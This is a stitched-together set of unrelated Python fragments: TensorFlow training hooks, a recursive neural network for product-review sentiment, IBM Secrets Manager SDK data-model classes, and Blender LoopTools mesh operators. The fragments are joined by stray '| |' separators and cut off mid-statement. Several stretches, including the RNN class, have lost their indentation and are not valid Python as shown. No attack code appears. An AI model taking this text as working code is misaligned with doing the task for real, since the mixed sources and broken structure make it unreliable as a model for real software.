            batcher: iterable yielding lists of input arrays; the LAST entry
                of each batch holds the one-hot target labels.
            placeholders: TF placeholders matching the batch entries, in order.
            at_every_epoch: evaluate only when epoch % at_every_epoch == 0.
        """
        self.batcher = batcher
        self.placeholders = placeholders
        self.at_every_epoch = at_every_epoch
    def __call__(self, sess, epoch, iter, model, loss, current_feed_dict=None):
        """Evaluate at the first iteration of every `at_every_epoch`-th epoch."""
        if iter == 0 and epoch % self.at_every_epoch == 0:
            total = 0
            correct = 0
            truth_all = []
            pred_all = []
            for values in self.batcher:
                total += len(values[-1])
                # feed each placeholder with the matching batch column
                feed_dict = {}
                for i in range(0, len(self.placeholders)):
                    feed_dict[self.placeholders[i]] = values[i]
                truth = np.argmax(values[-1], 1)
                # tf.argmax replaces the deprecated tf.arg_max (removed in TF 2.x)
                predicted = sess.run(tf.argmax(tf.nn.softmax(model), 1), feed_dict=feed_dict)
                correct += sum(truth == predicted)
                truth_all.extend(truth)
                pred_all.extend(predicted)
            print(classification_report(truth_all, pred_all, digits=4))
class SaveModelHook(Hook):
    """Hook that (eventually) checkpoints the trainable variables at a target epoch."""
    def __init__(self, path, at_epoch, at_every_epoch=0):
        """
        Args:
            path: directory the checkpoint will be written to.
            at_epoch: epoch at which to save.
            at_every_epoch: unused here; kept for the common hook interface.
        """
        self.path = path + "/"
        self.at_epoch = at_epoch
        self.at_every_epoch = at_every_epoch
        # fixme: don't save optimizer parameters
        # self.saver = tf.train.Saver(tf.global_variables())
        self.saver = tf.train.Saver(tf.trainable_variables())
    def __call__(self, sess, epoch, iter, model, loss, current_feed_dict=None):
        """Log once the target epoch is reached; the actual saving is still TODO."""
        if epoch != self.at_epoch:
            return
        logger.info("Saving model...")
        # todo
        #save_model(self.saver, sess, self.path, model, None)
class LoadModelHook(Hook):
    """Hook that (eventually) restores model weights once a target epoch is reached."""
    def __init__(self, path, at_epoch, at_every_epoch=0):
        """
        Args:
            path: directory the checkpoint would be read from.
            at_epoch: epoch at which to load.
            at_every_epoch: unused here; kept for the common hook interface.
        """
        self.path = path + "/"
        self.at_epoch = at_epoch
        self.at_every_epoch = at_every_epoch
        self.saver = tf.train.Saver(tf.global_variables())
    def __call__(self, sess, epoch, iter, model, loss, current_feed_dict=None):
        """Log once the target epoch is reached; the actual loading is still TODO."""
        if epoch != self.at_epoch:
            return
        logger.info("Loading model...")
        # todo: restore the checkpoint via self.saver / load_model
# Repository: jalayrupera/Sentiment-analysis-on-amazon-product
# -*- coding: utf8 -*-
import numpy as np
import pickle
import Tree
class RNN(object):
"""Class to use Recursive Neural Network on Tree
Usage
-----
Methods
-------
"""
def __init__(self, vocab={}, dim=30, r=0.0001, reg=1):
self.dim = dim
#Initiate V, the tensor operator
self.V = np.random.uniform(-r, r, size=(dim, 2*dim, 2*dim))
self.V = (self.V+np.transpose(self.V, axes=[0, 2, 1]))/2
#Initiate W, the linear operator
self.W = np.random.uniform(-r, r, size=(dim, 2*dim))
#Initiate Ws, the linear operator
self.Ws = np.random.uniform(-r, r, size=(2, dim))
#Regularisation
self.regV = reg*0.001
self.regW = reg*0.001
self.regWs = reg*0.0001
self.regL = reg*0.0001
#Initiate L, the Lexicon representation
self.L = np.random.uniform(-r, r, size=(len(vocab), dim))
self.vocab = {}
for i, w in enumerate(vocab):
self.vocab[w] = i
self.f = lambda X: np.tanh(X.T.dot(self.V).dot(X) + self.W.dot(X))
self.grad = lambda f: 1-f**2
self.y = lambda x: np.exp(self.Ws.dot(x).clip(-500, 700)) \
/ sum(np.exp(self.Ws.dot(x).clip(-500, 700)))
def save(self, saveFile):
with open(saveFile, 'wb') as output:
pickle.dump(self.dim, output, -1)
pickle.dump(self.V, output, -1)
pickle.dump(self.W, output, -1)
pickle.dump(self.Ws, output, -1)
pickle.dump(self.regV, output, -1)
pickle.dump(self.regW, output, -1)
pickle.dump(self.regWs, output, -1)
pickle.dump(self.regL, output, -1)
pickle.dump(self.L, output, -1)
pickle.dump(self.vocab, output, -1)
def load(self, loadFile):
with open(loadFile, 'rb') as input:
self.dim = pickle.load(input)
self.V = pickle.load(input)
self.W = pickle.load(input)
self.Ws = pickle.load(input)
self.regV = pickle.load(input)
self.regW = pickle.load(input)
self.regWs = pickle.load(input)
self.regL = pickle.load(input)
self.L = pickle.load(input)
self.vocab = pickle.load(input)
def error(self, val_set):
'''
Calcule l'erreur moyenne sur le set val_set avec les parametres actuel
'''
errorVal = 0.0
for X_tree in val_set:
errorVal += self.forward_pass(X_tree)
return errorVal/len(val_set)
    def forward_pass(self, X_tree):
        '''
        Run the forward pass on ``X_tree`` and return its total cross-entropy
        error; updates ``X`` (descriptor) and ``ypred`` on every node in place.
        '''
        errorVal = 0.0
        for n in X_tree.leaf:
            n.X = self.L[self.vocab[n.word]] # refresh the word vector from the current Lexicon
            n.ypred = self.y(n.X) # update the predicted label distribution
            n.ypred += 1e-300*(n.ypred == 0) # avoid log(0) below
            assert (n.ypred != 0).all()
            errorVal += -np.sum(n.y*np.log(n.ypred)) # cross-entropy of the leaf
        for p, [a, b] in X_tree.parcours:
            aT = X_tree.nodes[a] #
            bT = X_tree.nodes[b] # fetch the (parent, child1, child2) nodes of each triple
            pT = X_tree.nodes[p]
            # children are concatenated left-to-right according to word order
            if aT.order < bT.order:
                X = np.append(aT.X, bT.X)
            else:
                X = np.append(bT.X, aT.X)
            pT.X = self.f(X) # update the parent's descriptor
            pT.ypred = self.y(pT.X) # update the predicted label distribution
            pT.ypred += 1e-300*(pT.ypred == 0)
            errorVal += -np.sum(pT.y*np.log(pT.ypred))
        #E = sum([(self.y(n.X) - n.y) for n in X_tree.nodes])
        #print E
        #return self.Ws.dot(pT.X) -> no need to return the label; should it be updated too?
        return errorVal
    def backward_pass(self, X_tree, root=False):
        '''
        Return the gradients (dWs, dV, dW, dL) of the error on ``X_tree``.
        Warning: assumes ``forward_pass`` has already been run on this tree
        (``n.X`` / ``n.ypred`` must be up to date).
        ``root`` is currently unused — TODO confirm callers before removing.
        '''
        # Initialise the gradients
        dWs = np.zeros(self.Ws.shape)
        dV = np.zeros(self.V.shape)
        dW = np.zeros(self.W.shape)
        dL = np.zeros(self.L.shape)
        # Initialise the deltas (softmax error projected back onto each node)
        for n in X_tree.nodes:
            n.d = self.Ws.T.dot(n.ypred-n.y)
        # Walk down the tree (reverse traversal order)
        for p, [a, b] in X_tree.parcours[::-1]:
            aT = X_tree.nodes[a] #
            bT = X_tree.nodes[b] # fetch the (parent, child1, child2) nodes of each triple
            pT = X_tree.nodes[p]
            gX = self.grad(pT.X)
            # Propagate the errors downwards
            if aT.order < bT.order: # aT is the left child
                X = np.append(aT.X, bT.X)
                ddown = (self.W.T.dot(pT.d*gX)+2*(pT.d*gX).dot(self.V.dot(X)))
                aT.d += ddown[:self.dim]
                bT.d += ddown[self.dim:]
            else: # aT is the right child
                X = np.append(bT.X, aT.X)
                ddown = (self.W.T.dot(pT.d*gX)+2*(pT.d*gX).dot(self.V.dot(X)))
                aT.d += ddown[self.dim:]
                bT.d += ddown[:self.dim]
            # Contribution of pT to the gradients
            dWs += np.outer(pT.ypred-pT.y, pT.X)
            dV += np.tensordot(pT.d*gX, np.outer(X, X), axes=0)
            dW += np.outer(pT.d*gX, X)
        # Contribution of the leaves (lexicon gradient)
        for n in X_tree.leaf:
            dL[self.vocab[n.word]] += n.d
            dWs += np.outer(n.ypred-n.y, n.X)
        return dWs, dV, dW, dL
    def train(self, X_trees, learning_rate=0.01, mini_batch_size=27,
              warm_start=True, r=0.0001, max_iter=1000, val_set=[],
              n_check=100, strat='AdaGrad',
              bin=False, reset_freq=-1, save_tmp='tmp.pkl', n_stop=4):
        '''
        Train the model by mini-batch gradient descent with AdaGrad
        (Duchi et al.) or RMSprop step normalisation, on a list of trees.

        Args:
            X_trees: list of training trees.
            learning_rate: base step size ``eta``.
            mini_batch_size: number of trees sampled per iteration.
            warm_start: when False, re-initialise all parameters first.
            r: half-width of the uniform re-initialisation interval.
            max_iter: hard cap on the number of iterations.
            val_set: validation trees; enables error tracking and early
                stopping. (NOTE(review): mutable default ``[]`` — never
                mutated here, but a ``None`` default would be safer.)
            n_check: run a validation check every ``n_check`` iterations.
            strat: 'AdaGrad'; any other value selects the RMSprop branch.
            bin: unused in this method — TODO confirm callers.
            reset_freq: reset the accumulated squared gradients every
                ``reset_freq`` iterations (<= 0 disables the reset).
            save_tmp: pickle file the error curves are checkpointed to.
            n_stop: stop after this many consecutive validation increases.

        Returns:
            (errMB, errVal): mini-batch and validation error histories.
        '''
        # Reset the model when no warm start is wanted
        if not warm_start:
            dim = self.dim
            # Initiate V, the tensor operator
            self.V = np.random.uniform(-r, r, size=(dim, 2*dim, 2*dim))
            self.V = (self.V+np.transpose(self.V, axes=[0, 2, 1]))/2
            # Initiate W, the linear operator
            self.W = np.random.uniform(-r, r, size=(dim, 2*dim))
            # Initiate Ws, the linear operator
            self.Ws = np.random.uniform(-r, r, size=(2, dim))
            # Initiate L, the Lexicon representation
            self.L = np.random.uniform(-r, r, size=(len(self.vocab), dim))
        # Error histories
        errMB = []
        errVal = []
        # Stopping-condition state
        n_iter = 1
        gradNorm = 1.0
        if val_set != []:
            # Regularised validation error before training starts
            prevError = self.error(val_set)
            prevError += self.regWs*np.sum(self.Ws*self.Ws)/2.0
            prevError += self.regW*np.sum(self.W*self.W)/2.0
            prevError += self.regV*np.sum(self.V*self.V)/2.0
            prevError += self.regL*np.sum(self.L*self.L)/2.0
            iniError = prevError
            minError = prevError # optimal error so far
            glError = 0
            upStop = 0
            errVal.append(prevError)
        # Squared-gradient accumulators for AdaGrad/RMSprop normalisation
        eta = learning_rate
        dWsHist = np.zeros(self.Ws.shape)
        dVHist = np.zeros(self.V.shape)
        dWHist = np.zeros(self.W.shape)
        dLHist = np.zeros(self.L.shape)
        # Adaptive per-weight learning-rate masks for the RMSprop branch
        dWsMask = np.ones(self.Ws.shape)
        dVMask = np.ones(self.V.shape)
        dWMask = np.ones(self.W.shape)
        dLMask = np.ones(self.L.shape)
        dWsPrev = np.zeros(self.Ws.shape)
        dVPrev = np.zeros(self.V.shape)
        dWPrev = np.zeros(self.W.shape)
        dLPrev = np.zeros(self.L.shape)
        early_stop = False
        while (not early_stop) and n_iter < max_iter: # stop on early-stop flag or iteration cap
            if n_iter % reset_freq == 0 and reset_freq > 0: # periodic reset of the accumulators, cf. Socher
                dWsHist = np.zeros(self.Ws.shape)
                dVHist = np.zeros(self.V.shape)
                dWHist = np.zeros(self.W.shape)
                dLHist = np.zeros(self.L.shape)
            #Choose mini batch randomly
            mini_batch_samples = np.random.choice(X_trees, size=mini_batch_size)
            #Initialize gradients to 0
            dWsCurrent = np.zeros(self.Ws.shape)
            dVCurrent = np.zeros(self.V.shape)
            dWCurrent = np.zeros(self.W.shape)
            dLCurrent = np.zeros(self.L.shape)
            # Accumulate error and gradients over the mini batch
            currentMbe = 0.0
            for X_tree in mini_batch_samples:
                currentMbe += self.forward_pass(X_tree)
                dWs, dV, dW, dL = self.backward_pass(X_tree)
                dWsCurrent += dWs
                dVCurrent += dV
                dWCurrent += dW
                dLCurrent += dL
            currentMbe /= mini_batch_size
            currentMbe += self.regWs*np.sum(self.Ws*self.Ws)/2.0
            currentMbe += self.regW*np.sum(self.W*self.W)/2.0
            currentMbe += self.regV*np.sum(self.V*self.V)/2.0
            currentMbe += self.regL*np.sum(self.L*self.L)/2.0
            # Average over the batch and add the regularisation gradients
            dWsCurrent = dWsCurrent/mini_batch_size+self.regWs*self.Ws
            dVCurrent = dVCurrent/mini_batch_size+self.regV*self.V
            dWCurrent = dWCurrent/mini_batch_size+self.regW*self.W
            dLCurrent = dLCurrent/mini_batch_size+self.regL*self.L
            # Turn the raw gradients into normalised update steps
            if strat == 'AdaGrad':
                eps = 0.001 # keeps AdaGrad's denominator > 0, cf. Socher
                dWsHist += dWsCurrent*dWsCurrent
                dVHist += dVCurrent*dVCurrent
                dWHist += dWCurrent*dWCurrent
                dLHist += dLCurrent*dLCurrent
                dWsCurrent = eta*dWsCurrent/np.sqrt(dWsHist+eps)
                dWCurrent = eta*dWCurrent/np.sqrt(dWHist+eps)
                dVCurrent = eta*dVCurrent/np.sqrt(dVHist+eps)
                dLCurrent = eta*dLCurrent/np.sqrt(dLHist+eps)
            else:
                # RMSprop with a sign-based adaptive per-weight rate:
                # the mask grows (x1.2) where the step kept its sign, shrinks (x0.5) otherwise
                eps = 0.001
                dWsHist = 0.9*dWsHist + 0.1*dWsCurrent*dWsCurrent
                dVHist = 0.9*dVHist + 0.1*dVCurrent*dVCurrent
                dWHist = 0.9*dWHist + 0.1*dWCurrent*dWCurrent
                dLHist = 0.9*dLHist + 0.1*dLCurrent*dLCurrent
                dWsMask *= .7*(dWsPrev*dWsCurrent >= 0) + .5
                dWMask *= .7*(dWPrev*dWCurrent >= 0) + .5
                dVMask *= .7*(dVPrev*dVCurrent >= 0) + .5
                dLMask *= .7*(dLPrev*dLCurrent >= 0) + .5
                dWsCurrent = eta*dWsMask.clip(1e-6, 50, out=dWsMask)*dWsCurrent/np.sqrt(dWsHist+eps)
                dWCurrent = eta*dWMask.clip(1e-6, 50, out=dWMask)*dWCurrent/np.sqrt(dWHist+eps)
                dVCurrent = eta*dVMask.clip(1e-6, 20, out=dVMask)*dVCurrent/np.sqrt(dVHist+eps)
                dLCurrent = eta*dLMask.clip(1e-6, 20, out=dLMask)*dLCurrent/np.sqrt(dLHist+eps)
            # L1 norm of the step (reported as a diagnostic)
            gradNorm = np.sum(np.abs(dWsCurrent))
            gradNorm += np.sum(np.abs(dWCurrent))
            gradNorm += np.sum(np.abs(dVCurrent))
            gradNorm += np.sum(np.abs(dLCurrent))
            # Keep previous step (for the sign comparison above)
            dWsPrev = dWsCurrent
            dWPrev = dWCurrent
            dVPrev = dVCurrent
            dLPrev = dLCurrent
            # Descent step
            self.Ws -= dWsCurrent
            self.W -= dWCurrent
            self.V -= dVCurrent
            self.L -= dLCurrent
            # Update the stopping condition on validation checks
            if val_set != [] and (n_iter % n_check) == 0:
                currentError = self.error(val_set)
                currentError += self.regWs*np.sum(self.Ws*self.Ws)/2.0
                currentError += self.regW*np.sum(self.W*self.W)/2.0
                currentError += self.regV*np.sum(self.V*self.V)/2.0
                currentError += self.regL*np.sum(self.L*self.L)/2.0
                errVal.append(currentError)
                errMB.append(currentMbe)
                print('Error on validation set at iter {0} : {1} '
                      '(previous : {2})'.format(n_iter, currentError, prevError))
                print('Error on mini batch at iter {0} : {1} '
                      '(Gradient norm : {2})'.format(n_iter, currentMbe, gradNorm))
                # checkpoint the error curves
                with open(save_tmp, 'wb') as output:
                    pickle.dump(errVal, output, -1)
                    pickle.dump(errMB, output, -1)
                #Early stopping
                minError = min(minError, currentError)
                glError = 100*((currentError/minError)-1.0)
                if currentError > prevError:
                    upStop += 1
                else:
                    upStop = 0
                early_stop = (upStop >= n_stop) and (n_stop > 0) # UP criterion
                prevError = currentError
            else:
                print('Error on mini batch at iter {0} : {1} '
                      '(Gradient norm : {2})'.format(n_iter, currentMbe, gradNorm))
                errMB.append(currentMbe)
            # Next iteration
            n_iter += 1
        if val_set != []:
            # NOTE(review): currentError/glError are only bound if at least one
            # validation check ran — confirm max_iter > n_check when val_set is given.
            print('Error on training set before and after training'
                  '({2} iter) : {0}->{1}\n'.format(iniError, currentError, n_iter))
            print('Generalization error : {0}'.format(glError))
        return errMB, errVal
def score_fine(self, X_trees):
'''
Score sur les predictions MAP avec 5 label
'''
countAll = 0
countRoot = 0
scAll = 0.0
scRoot = 0.0
for X_tree in X_trees:
self.forward_pass(X_tree)
for n in X_tree.nodes:
countAll += 1
scAll += (Tree.Tree.getSoftLabel(n.ypred[1]) == Tree.Tree.getSoftLabel(n.y[1]))
countRoot += 1
n = X_tree.nodes[-1]
scRoot += (Tree.Tree.getSoftLabel(n.ypred[1]) == Tree.Tree.getSoftLabel(n.y[1]))
return scAll/countAll, scRoot/countRoot
def score_binary(self, X_trees, inc_neut=False):
'''
Score sur les prediction MAP pos/neg
'''
countAll = 0
countRoot = 0
scAll = 0.0
scRoot = | |
Dict) -> 'GetSecret':
"""Initialize a GetSecret object from a json dictionary."""
args = {}
if 'metadata' in _dict:
args['metadata'] = CollectionMetadata.from_dict(_dict.get('metadata'))
else:
raise ValueError('Required property \'metadata\' not present in GetSecret JSON')
if 'resources' in _dict:
args['resources'] = _dict.get('resources')
else:
raise ValueError('Required property \'resources\' not present in GetSecret JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a GetSecret object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'metadata') and self.metadata is not None:
_dict['metadata'] = self.metadata.to_dict()
if hasattr(self, 'resources') and self.resources is not None:
resources_list = []
for x in self.resources:
if isinstance(x, dict):
resources_list.append(x)
else:
resources_list.append(x.to_dict())
_dict['resources'] = resources_list
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this GetSecret object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'GetSecret') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'GetSecret') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class GetSecretPolicies():
    """
    GetSecretPolicies.

    Abstract base: instantiate one of the defined subclasses instead.
    """

    def __init__(self) -> None:
        """
        Initialize a GetSecretPolicies object.

        Always raises: this base class cannot be instantiated directly.
        """
        subclasses = ", ".join(['GetSecretPolicyRotation'])
        raise Exception(
            "Cannot instantiate base class. Instead, instantiate one of the defined subclasses: {0}".format(
                subclasses))
class GetSecretPolicyRotationResourcesItem():
    """
    Properties that describe a rotation policy.

    :attr str id: The v4 UUID that uniquely identifies the policy.
    :attr str crn: (optional) The Cloud Resource Name (CRN) that uniquely identifies
          your cloud resources.
    :attr datetime creation_date: (optional) The date the policy was created. The
          date format follows RFC 3339.
    :attr str created_by: (optional) The unique identifier for the entity that
          created the policy.
    :attr datetime last_update_date: (optional) Updates when the policy is replaced
          or modified. The date format follows RFC 3339.
    :attr str updated_by: (optional) The unique identifier for the entity that
          updated the policy.
    :attr str type: The MIME type that represents the policy. Currently, only the
          default is supported.
    :attr SecretPolicyRotationRotation rotation:
    """

    def __init__(self,
                 id: str,
                 type: str,
                 rotation: 'SecretPolicyRotationRotation',
                 *,
                 crn: str = None,
                 creation_date: datetime = None,
                 created_by: str = None,
                 last_update_date: datetime = None,
                 updated_by: str = None) -> None:
        """
        Initialize a GetSecretPolicyRotationResourcesItem object.

        :param str id: The v4 UUID that uniquely identifies the policy.
        :param str type: The MIME type that represents the policy. Currently, only
               the default is supported.
        :param SecretPolicyRotationRotation rotation:
        """
        self.id = id
        self.crn = crn
        self.creation_date = creation_date
        self.created_by = created_by
        self.last_update_date = last_update_date
        self.updated_by = updated_by
        self.type = type
        self.rotation = rotation

    @classmethod
    def from_dict(cls, _dict: Dict) -> 'GetSecretPolicyRotationResourcesItem':
        """Initialize a GetSecretPolicyRotationResourcesItem object from a json dictionary."""
        args = {}
        if 'id' not in _dict:
            raise ValueError('Required property \'id\' not present in GetSecretPolicyRotationResourcesItem JSON')
        args['id'] = _dict.get('id')
        # optional plain-string properties
        for key in ('crn', 'created_by', 'updated_by'):
            if key in _dict:
                args[key] = _dict.get(key)
        # optional RFC 3339 date properties
        for key in ('creation_date', 'last_update_date'):
            if key in _dict:
                args[key] = string_to_datetime(_dict.get(key))
        for key in ('type', 'rotation'):
            if key not in _dict:
                raise ValueError('Required property \'{0}\' not present in GetSecretPolicyRotationResourcesItem JSON'.format(key))
            args[key] = _dict.get(key)
        return cls(**args)

    @classmethod
    def _from_dict(cls, _dict):
        """Initialize a GetSecretPolicyRotationResourcesItem object from a json dictionary."""
        return cls.from_dict(_dict)

    def to_dict(self) -> Dict:
        """Return a json dictionary representing this model."""
        result = {}
        # insertion order is preserved so __str__ output stays stable
        for name in ('id', 'crn', 'creation_date', 'created_by',
                     'last_update_date', 'updated_by', 'type'):
            if not hasattr(self, name):
                continue
            value = getattr(self, name)
            if value is None:
                continue
            if name in ('creation_date', 'last_update_date'):
                value = datetime_to_string(value)
            result[name] = value
        rotation = getattr(self, 'rotation', None)
        if rotation is not None:
            result['rotation'] = rotation if isinstance(rotation, dict) else rotation.to_dict()
        return result

    def _to_dict(self):
        """Return a json dictionary representing this model."""
        return self.to_dict()

    def __str__(self) -> str:
        """Return a `str` version of this GetSecretPolicyRotationResourcesItem object."""
        body = self.to_dict()
        return json.dumps(body, indent=2)

    def __eq__(self, other: 'GetSecretPolicyRotationResourcesItem') -> bool:
        """Return `true` when self and other are equal, false otherwise."""
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        return False

    def __ne__(self, other: 'GetSecretPolicyRotationResourcesItem') -> bool:
        """Return `true` when self and other are not equal, false otherwise."""
        return not self == other

    class TypeEnum(str, Enum):
        """
        The MIME type that represents the policy. Currently, only the default is
        supported.
        """
        APPLICATION_VND_IBM_SECRETS_MANAGER_SECRET_POLICY_JSON = 'application/vnd.ibm.secrets-manager.secret.policy+json'
class GetSecretVersion():
    """
    Properties that describe the version of a secret.

    :attr CollectionMetadata metadata: The metadata that describes the resource
          array.
    :attr List[SecretVersion] resources: A collection of resources.
    """

    def __init__(self,
                 metadata: 'CollectionMetadata',
                 resources: List['SecretVersion']) -> None:
        """
        Initialize a GetSecretVersion object.

        :param CollectionMetadata metadata: The metadata that describes the
               resource array.
        :param List[SecretVersion] resources: A collection of resources.
        """
        self.metadata = metadata
        self.resources = resources

    @classmethod
    def from_dict(cls, _dict: Dict) -> 'GetSecretVersion':
        """Initialize a GetSecretVersion object from a json dictionary."""
        if 'metadata' not in _dict:
            raise ValueError('Required property \'metadata\' not present in GetSecretVersion JSON')
        metadata = CollectionMetadata.from_dict(_dict.get('metadata'))
        if 'resources' not in _dict:
            raise ValueError('Required property \'resources\' not present in GetSecretVersion JSON')
        return cls(metadata=metadata, resources=_dict.get('resources'))

    @classmethod
    def _from_dict(cls, _dict):
        """Initialize a GetSecretVersion object from a json dictionary."""
        return cls.from_dict(_dict)

    def to_dict(self) -> Dict:
        """Return a json dictionary representing this model."""
        result = {}
        metadata = getattr(self, 'metadata', None)
        if metadata is not None:
            result['metadata'] = metadata.to_dict()
        resources = getattr(self, 'resources', None)
        if resources is not None:
            # resources may hold plain dicts or model objects
            result['resources'] = [
                item if isinstance(item, dict) else item.to_dict()
                for item in resources
            ]
        return result

    def _to_dict(self):
        """Return a json dictionary representing this model."""
        return self.to_dict()

    def __str__(self) -> str:
        """Return a `str` version of this GetSecretVersion object."""
        body = self.to_dict()
        return json.dumps(body, indent=2)

    def __eq__(self, other: 'GetSecretVersion') -> bool:
        """Return `true` when self and other are equal, false otherwise."""
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        return False

    def __ne__(self, other: 'GetSecretVersion') -> bool:
        """Return `true` when self and other are not equal, false otherwise."""
        return not self == other
class GetSecretVersionMetadata():
"""
Properties that describe the version of a secret.
:attr CollectionMetadata metadata: The metadata that describes the resource
array.
:attr List[SecretVersionMetadata] resources: A collection of resources.
"""
def __init__(self,
metadata: 'CollectionMetadata',
resources: List['SecretVersionMetadata']) -> None:
"""
Initialize a GetSecretVersionMetadata object.
:param CollectionMetadata metadata: The metadata that describes the
resource array.
:param List[SecretVersionMetadata] resources: A collection of resources.
"""
self.metadata = metadata
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'GetSecretVersionMetadata':
"""Initialize a GetSecretVersionMetadata object from a json dictionary."""
args = {}
if 'metadata' in _dict:
args['metadata'] = CollectionMetadata.from_dict(_dict.get('metadata'))
else:
raise ValueError('Required property \'metadata\' not present in GetSecretVersionMetadata JSON')
if 'resources' in _dict:
args['resources'] = _dict.get('resources')
else:
raise ValueError('Required property \'resources\' not present in GetSecretVersionMetadata JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a GetSecretVersionMetadata object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'metadata') and self.metadata is not None:
_dict['metadata'] = self.metadata.to_dict()
if hasattr(self, 'resources') and self.resources is not None:
resources_list = []
for x in self.resources:
if isinstance(x, dict):
resources_list.append(x)
else:
resources_list.append(x.to_dict())
_dict['resources'] = resources_list
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this GetSecretVersionMetadata object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'GetSecretVersionMetadata') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'GetSecretVersionMetadata') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self | |
@classmethod
def poll(cls, context):
ob = context.active_object
return(ob and ob.type == 'MESH' and context.mode == 'EDIT_MESH')
def draw(self, context):
layout = self.layout
col = layout.column()
col.prop(self, "interpolation")
col.prop(self, "input")
col.prop(self, "iterations")
col.prop(self, "regular")
def invoke(self, context, event):
# load custom settings
settings_load(self)
return self.execute(context)
    def execute(self, context):
        """Relax the selected loops by repeatedly fitting splines through them."""
        # initialise
        global_undo, object, mesh = initialise()
        settings_write(self)
        # check cache to see if we can save time
        cached, single_loops, loops, derived, mapping = cache_read("Relax",
            object, mesh, self.input, False)
        if cached:
            derived, mesh_mod = get_derived_mesh(object, mesh, context.scene)
        else:
            # find loops
            derived, mesh_mod, loops = get_connected_input(object, mesh,
                context.scene, self.input)
            mapping = get_mapping(derived, mesh, mesh_mod, False, False, loops)
            loops = check_loops(loops, mapping, mesh_mod)
        knots, points = relax_calculate_knots(loops)
        # saving cache for faster execution next time
        if not cached:
            cache_write("Relax", object, mesh, self.input, False, False, loops,
                derived, mapping)
        for iteration in range(int(self.iterations)):
            # calculate splines and new positions
            tknots, tpoints = relax_calculate_t(mesh_mod, knots, points,
                self.regular)
            splines = []
            for i in range(len(knots)):
                splines.append(calculate_splines(self.interpolation, mesh_mod,
                    tknots[i], knots[i]))
            move = [relax_calculate_verts(mesh_mod, self.interpolation,
                tknots, knots, tpoints, points, splines)]
            # NOTE(review): influence -1 presumably means "apply fully" — confirm
            # against move_verts, defined elsewhere in this module
            move_verts(mesh, mapping, move, -1)
        # cleaning up: drop the temporary modifier-applied mesh, restore undo
        if derived:
            bpy.context.blend_data.meshes.remove(mesh_mod)
        terminate(global_undo)
        return{'FINISHED'}
# space operator
class Space(bpy.types.Operator):
    """Space the vertices of the selected loops at regular intervals."""
    bl_idname = "mesh.looptools_space"
    bl_label = "Space"
    # fixed user-visible typo: "distrubtion" -> "distribution"
    bl_description = "Space the vertices in a regular distribution on the loop"
    bl_options = {'REGISTER', 'UNDO'}
    influence = bpy.props.FloatProperty(name = "Influence",
        description = "Force of the tool",
        default = 100.0,
        min = 0.0,
        max = 100.0,
        precision = 1,
        subtype = 'PERCENTAGE')
    input = bpy.props.EnumProperty(name = "Input",
        items = (("all", "Parallel (all)", "Also use non-selected "\
            "parallel loops as input"),
            ("selected", "Selection","Only use selected vertices as input")),
        description = "Loops that are spaced",
        default = 'selected')
    interpolation = bpy.props.EnumProperty(name = "Interpolation",
        items = (("cubic", "Cubic", "Natural cubic spline, smooth results"),
            ("linear", "Linear", "Vertices are projected on existing edges")),
        description = "Algorithm used for interpolation",
        default = 'cubic')
    @classmethod
    def poll(cls, context):
        """Operator is available only for a mesh object while in Edit mode."""
        ob = context.active_object
        return(ob and ob.type == 'MESH' and context.mode == 'EDIT_MESH')
    def draw(self, context):
        """Draw the operator options in a single column."""
        layout = self.layout
        col = layout.column()
        col.prop(self, "interpolation")
        col.prop(self, "input")
        col.separator()
        col.prop(self, "influence")
    def invoke(self, context, event):
        """Restore the user's stored tool settings, then run the operator."""
        # load custom settings
        settings_load(self)
        return self.execute(context)
    def execute(self, context):
        """Redistribute the loop vertices evenly along spline fits of each loop."""
        # initialise
        global_undo, object, mesh = initialise()
        settings_write(self)
        # check cache to see if we can save time
        cached, single_loops, loops, derived, mapping = cache_read("Space",
            object, mesh, self.input, False)
        if cached:
            derived, mesh_mod = get_derived_mesh(object, mesh, context.scene)
        else:
            # find loops
            derived, mesh_mod, loops = get_connected_input(object, mesh,
                context.scene, self.input)
            mapping = get_mapping(derived, mesh, mesh_mod, False, False, loops)
            loops = check_loops(loops, mapping, mesh_mod)
        # saving cache for faster execution next time
        if not cached:
            cache_write("Space", object, mesh, self.input, False, False, loops,
                derived, mapping)
        move = []
        for loop in loops:
            # calculate splines and new positions
            if loop[1]: # circular: close the loop by repeating its first vertex
                loop[0].append(loop[0][0])
            tknots, tpoints = space_calculate_t(mesh_mod, loop[0][:])
            splines = calculate_splines(self.interpolation, mesh_mod,
                tknots, loop[0][:])
            move.append(space_calculate_verts(mesh_mod, self.interpolation,
                tknots, tpoints, loop[0][:-1], splines))
        # move vertices to new locations
        move_verts(mesh, mapping, move, self.influence)
        # cleaning up: drop the temporary modifier-applied mesh, restore undo
        if derived:
            bpy.context.blend_data.meshes.remove(mesh_mod)
        terminate(global_undo)
        return{'FINISHED'}
##########################################
####### GUI and registration #############
##########################################
# menu containing all tools
class VIEW3D_MT_edit_mesh_looptools(bpy.types.Menu):
    """Menu listing every LoopTools operator."""
    bl_label = "LoopTools"

    def draw(self, context):
        layout = self.layout
        # Bridge and Loft share one operator, switched by the `loft` flag
        bridge = layout.operator("mesh.looptools_bridge", text="Bridge")
        bridge.loft = False
